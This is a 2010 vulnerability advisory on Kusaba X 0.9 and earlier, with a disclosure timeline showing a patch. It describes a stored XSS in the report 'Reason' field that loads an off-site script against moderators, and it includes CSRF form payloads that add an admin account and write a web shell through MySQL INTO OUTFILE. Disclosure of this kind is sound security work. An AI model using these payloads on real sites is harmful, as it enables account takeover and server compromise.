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HistoryFeb 22, 2010 - 12:00 a.m.

Kusaba X <= 0.9 XSS/CSRF vulnerabilities


Kusaba X <= 0.9 XSS/CSRF vulnerabilities

Kusaba X suffers XSS and CSRF vulnerabilities that would allow an attacker to take over the web
application and possibly the entire server (depending on the MySQL configuration). The XSS
vulnerability is not required to exploit the CSRF but makes the proccess very easy.


The “Reason” field in the report function doesn't sanitize user input. The input size is limited to
256 characters, (pleanty for exploitation, but not enough for a textwall of CSRF forms). This can be
circumvented by including off-site javascripts, i.e. <script
src=";&gt;&lt;/script&gt;. (iframes work too) The injected script will render and
execute when a Moderator or Administrator views the reports. If a Moderator falls victim, the worst
case scenario would be cookie stealing followed by session hijacking and account theft. If an
Administrator were to view the malicious report, much more is possible. It would be easy to detect the
difference and act accordingly, making this attack more effective.


These run rampent throughout the application. Here are two of the most severe but there's lots of fun
to be had.

  1. Add administrative accouts…

<form action="http://example.chan/manage_page.php?action=staff&amp;add&quot; method="POST">
<input name="username" value="user123" />
<input name="password" value="pass123" />
<input name="type" value="1" />

  1. Execute MySQL queries…

<form action="http://example.chan/manage_page.php?action=sql&quot; method="POST">
<input name="query" value="SELECT 'your-shell-here' INTO OUTFILE '/path/to/www';" />

Feb 9, 2010 - Reported to Kusaba X dev team.
Feb 15, 2010 - Kusaba X 0.9.1 released containing patch.
Feb 17, 2010 - Info released

~~Thanks to Sazpaimon
~~Greetz to the open source community